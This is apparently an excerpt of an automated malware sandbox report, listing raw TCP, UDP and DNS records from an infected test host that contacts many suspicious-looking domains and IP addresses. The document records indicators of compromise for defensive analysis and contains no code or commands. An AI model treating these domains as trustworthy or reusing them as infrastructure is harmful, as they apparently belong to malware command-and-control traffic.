                                                                    Oct 30, 2024 04:57:49.538844109 CET5000180192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:49.642199039 CET805000131.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:49.647375107 CET5000180192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:50.135377884 CET5000180192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:51.151309967 CET5000280192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:51.156887054 CET805000231.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:51.156961918 CET5000280192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:51.164398909 CET5000280192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:51.169748068 CET805000231.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:52.067540884 CET805000231.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:52.116985083 CET5000280192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:52.224843025 CET805000231.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:57:52.229460955 CET5000280192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:52.232846022 CET5000280192.168.2.531.31.196.17
                                                                    Oct 30, 2024 04:57:52.238178015 CET805000231.31.196.17192.168.2.5
                                                                    Oct 30, 2024 04:58:05.323925018 CET5000380192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:05.329283953 CET8050003188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:05.329385042 CET5000380192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:05.341459036 CET5000380192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:05.346787930 CET8050003188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:05.942195892 CET8050003188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:05.944449902 CET8050003188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:05.947427034 CET5000380192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:06.851428986 CET5000380192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:07.871531963 CET5000480192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:07.877681971 CET8050004188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:07.879715919 CET5000480192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:07.891411066 CET5000480192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:07.896822929 CET8050004188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:08.498311996 CET8050004188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:08.500215054 CET8050004188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:08.500508070 CET5000480192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:09.398452997 CET5000480192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:10.417388916 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:10.422900915 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:10.429440022 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:10.437376022 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:10.442739964 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:10.442791939 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:11.039511919 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:11.041147947 CET8050005188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:11.041197062 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:11.949383974 CET5000580192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:12.963777065 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:12.969557047 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:12.969649076 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:12.976897955 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:12.982367039 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:13.599725008 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:13.602442980 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:13.602539062 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:13.603656054 CET5000680192.168.2.5188.114.97.3
                                                                    Oct 30, 2024 04:58:13.609029055 CET8050006188.114.97.3192.168.2.5
                                                                    Oct 30, 2024 04:58:18.644764900 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:18.650343895 CET8050007206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:18.650428057 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:18.677511930 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:18.684583902 CET8050007206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:20.179645061 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:20.226443052 CET8050007206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:21.198506117 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:21.204509020 CET8050008206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:21.204592943 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:21.220747948 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:21.227560043 CET8050008206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:22.726433039 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:22.778428078 CET8050008206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:23.744930029 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:23.751777887 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:23.755717039 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:23.767502069 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:23.772854090 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:23.772989035 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:25.276554108 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:25.326297998 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:26.292176962 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:26.297641993 CET8050010206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:26.301459074 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:26.308629036 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:26.314086914 CET8050010206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:27.126734018 CET8050007206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:27.126796007 CET5000780192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:29.698677063 CET8050008206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:29.705426931 CET5000880192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:32.237359047 CET8050009206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:32.237485886 CET5000980192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:34.799021959 CET8050010206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:34.799141884 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:34.800029039 CET5001080192.168.2.5206.119.82.147
                                                                    Oct 30, 2024 04:58:34.805387974 CET8050010206.119.82.147192.168.2.5
                                                                    Oct 30, 2024 04:58:39.822788954 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:39.828150034 CET8050011162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:39.829498053 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:39.838634968 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:39.843945980 CET8050011162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:40.511739969 CET8050011162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:40.554521084 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:40.556612968 CET8050011162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:40.557532072 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:41.351602077 CET5001180192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:42.373440981 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:42.378916025 CET8050012162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:42.385438919 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:42.393445969 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:42.398813963 CET8050012162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:43.058919907 CET8050012162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:43.097259045 CET8050012162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:43.097311020 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:43.898330927 CET5001280192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:44.917773962 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:44.923258066 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:44.923353910 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:44.936626911 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:44.942107916 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:44.942162991 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:45.593148947 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:45.631355047 CET8050013162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:45.631525040 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:46.445462942 CET5001380192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:47.463598967 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:47.469018936 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:47.469240904 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:47.476031065 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:47.481417894 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:48.152520895 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:48.191457987 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:48.193548918 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:48.197447062 CET5001480192.168.2.5162.0.209.213
                                                                    Oct 30, 2024 04:58:48.202753067 CET8050014162.0.209.213192.168.2.5
                                                                    Oct 30, 2024 04:58:53.329448938 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:53.334841967 CET80500153.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:53.334933043 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:53.440233946 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:53.445584059 CET80500153.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:54.945251942 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:54.951348066 CET80500153.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:54.951405048 CET5001580192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:55.969785929 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:55.975277901 CET80500163.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:55.977524042 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:55.987848043 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:55.993267059 CET80500163.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:56.637590885 CET80500163.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:56.637692928 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:57.492084980 CET5001680192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:57.498244047 CET80500163.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:58.513492107 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:58.519031048 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:58.519171000 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:58.529898882 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:58:58.536231995 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:58.536263943 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:59.148858070 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:58:59.148940086 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:00.038995028 CET5001780192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:00.044667959 CET80500173.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.057956934 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.063673973 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.063745975 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.072371960 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.077713013 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.726975918 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.761677980 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:01.765592098 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.769469023 CET5001880192.168.2.53.33.130.190
                                                                    Oct 30, 2024 04:59:01.774820089 CET80500183.33.130.190192.168.2.5
                                                                    Oct 30, 2024 04:59:06.793076038 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:06.799179077 CET8050019144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:06.799249887 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:06.812457085 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:06.817784071 CET8050019144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:07.453797102 CET8050019144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:07.485095024 CET8050019144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:07.485162973 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:08.321487904 CET5001980192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:09.341130972 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:09.346685886 CET8050020144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:09.346785069 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:09.360440969 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:09.365957975 CET8050020144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:10.005563974 CET8050020144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:10.038573027 CET8050020144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:10.038966894 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:10.867202044 CET5002080192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:11.885502100 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:11.890964985 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:11.893594027 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:11.905972958 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:11.911354065 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:11.911467075 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:12.557594061 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:12.588895082 CET8050021144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:12.589574099 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:13.415564060 CET5002180192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:14.432492971 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:14.438035965 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:14.441596031 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:14.457504988 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:14.462894917 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:15.088462114 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:15.119576931 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:15.119689941 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:15.121021032 CET5002280192.168.2.5144.34.186.85
                                                                    Oct 30, 2024 04:59:15.126414061 CET8050022144.34.186.85192.168.2.5
                                                                    Oct 30, 2024 04:59:20.371462107 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:20.376878023 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:20.376964092 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:20.388447046 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:20.393881083 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:21.101171017 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:21.101231098 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:21.101320028 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:21.160928965 CET8050023136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:21.160995960 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:21.898473978 CET5002380192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:23.229156971 CET5002480192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:23.234699011 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:23.234802008 CET5002480192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:23.244004965 CET5002480192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:23.249414921 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:23.993429899 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:23.993485928 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:23.999596119 CET5002480192.168.2.5136.143.186.12
                                                                    Oct 30, 2024 04:59:24.054604053 CET8050024136.143.186.12192.168.2.5
                                                                    Oct 30, 2024 04:59:24.059695005 CET5002480192.168.2.5136.143.186.12

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Oct 30, 2024 04:56:09.082786083 CET5841953192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:56:09.399851084 CET53584191.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:56:25.182429075 CET5057853192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:56:25.285238981 CET53505781.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:56:39.096533060 CET5405753192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:56:39.311584949 CET53540571.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:56:54.182391882 CET6346953192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:56:54.549531937 CET53634691.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:09.308176041 CET6328253192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:10.323276997 CET6328253192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:11.320214987 CET6328253192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:12.880155087 CET53632821.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:12.880172968 CET53632821.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:12.880181074 CET53632821.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:14.899755955 CET6411853192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:15.898577929 CET6411853192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:16.913949966 CET6411853192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:18.914454937 CET6411853192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:20.402605057 CET53641181.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:20.402631998 CET53641181.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:20.402648926 CET53641181.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:20.402659893 CET53641181.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:21.415488958 CET5019953192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:22.429847956 CET5019953192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:23.430227995 CET5019953192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:24.978745937 CET53501991.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:24.978761911 CET53501991.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:24.978771925 CET53501991.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:29.995359898 CET5610153192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:30.011158943 CET53561011.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:43.403220892 CET6178053192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:43.499269009 CET53617801.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:57:57.245762110 CET6051153192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:57:57.255835056 CET53605111.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:58:05.307842016 CET5678853192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:58:05.321018934 CET53567881.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:58:18.620256901 CET4919553192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:58:18.630414963 CET53491951.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:58:39.807605982 CET5463853192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:58:39.820667028 CET53546381.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:58:53.280267954 CET5392253192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:58:53.292062998 CET53539221.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:59:06.777034044 CET5766753192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:59:06.790622950 CET53576671.1.1.1192.168.2.5
                                                                    Oct 30, 2024 04:59:20.137525082 CET4985353192.168.2.51.1.1.1
                                                                    Oct 30, 2024 04:59:20.368876934 CET53498531.1.1.1192.168.2.5

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Oct 30, 2024 04:56:09.082786083 CET192.168.2.51.1.1.10x6553Standard query (0)www.ngmr.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:56:25.182429075 CET192.168.2.51.1.1.10x712dStandard query (0)www.drivedoge.websiteA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:56:39.096533060 CET192.168.2.51.1.1.10xa2b4Standard query (0)www.fieldelse.netA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:56:54.182391882 CET192.168.2.51.1.1.10x4862Standard query (0)www.patioprojex.africaA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:09.308176041 CET192.168.2.51.1.1.10xc4e1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:10.323276997 CET192.168.2.51.1.1.10xc4e1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:11.320214987 CET192.168.2.51.1.1.10xc4e1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:14.899755955 CET192.168.2.51.1.1.10xcfa1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:15.898577929 CET192.168.2.51.1.1.10xcfa1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:16.913949966 CET192.168.2.51.1.1.10xcfa1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:18.914454937 CET192.168.2.51.1.1.10xcfa1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:21.415488958 CET192.168.2.51.1.1.10xac1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:22.429847956 CET192.168.2.51.1.1.10xac1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:23.430227995 CET192.168.2.51.1.1.10xac1Standard query (0)www.animekuid.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:29.995359898 CET192.168.2.51.1.1.10x4ca8Standard query (0)www.huyven.xyzA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:43.403220892 CET192.168.2.51.1.1.10xf290Standard query (0)www.dverkom.storeA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:57.245762110 CET192.168.2.51.1.1.10x8ec2Standard query (0)www.longfilsalphonse.netA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:05.307842016 CET192.168.2.51.1.1.10xfe1Standard query (0)www.bayarcepat19.clickA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:18.620256901 CET192.168.2.51.1.1.10x267cStandard query (0)www.wdeb18.topA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:39.807605982 CET192.168.2.51.1.1.10x2f91Standard query (0)www.galaxyslot88rtp.latA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:58:53.280267954 CET192.168.2.51.1.1.10x4801Standard query (0)www.dto20.shopA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:59:06.777034044 CET192.168.2.51.1.1.10x5b6aStandard query (0)www.h5hph710am.siteA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:59:20.137525082 CET192.168.2.51.1.1.10xfd16Standard query (0)www.lanxuanz.techA (IP address)IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Oct 30, 2024 04:56:09.399851084 CET1.1.1.1192.168.2.50x6553No error (0)www.ngmr.xyz54.67.87.110A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:56:25.285238981 CET1.1.1.1192.168.2.50x712dNo error (0)www.drivedoge.website195.161.68.8A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:56:39.311584949 CET1.1.1.1192.168.2.50xa2b4No error (0)www.fieldelse.net18.141.10.107A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:56:54.549531937 CET1.1.1.1192.168.2.50x4862No error (0)www.patioprojex.africapatioprojex.africaCNAME (Canonical name)IN (0x0001)false
                                                                    Oct 30, 2024 04:56:54.549531937 CET1.1.1.1192.168.2.50x4862No error (0)patioprojex.africa197.189.237.186A (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:12.880155087 CET1.1.1.1192.168.2.50xc4e1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:12.880172968 CET1.1.1.1192.168.2.50xc4e1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:12.880181074 CET1.1.1.1192.168.2.50xc4e1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:20.402605057 CET1.1.1.1192.168.2.50xcfa1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:20.402631998 CET1.1.1.1192.168.2.50xcfa1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
                                                                    Oct 30, 2024 04:57:20.402648926 CET1.1.1.1192.168.2.50xcfa1Server failure (2)www.animekuid.xyznonenoneA (IP address)IN (0x0001)false
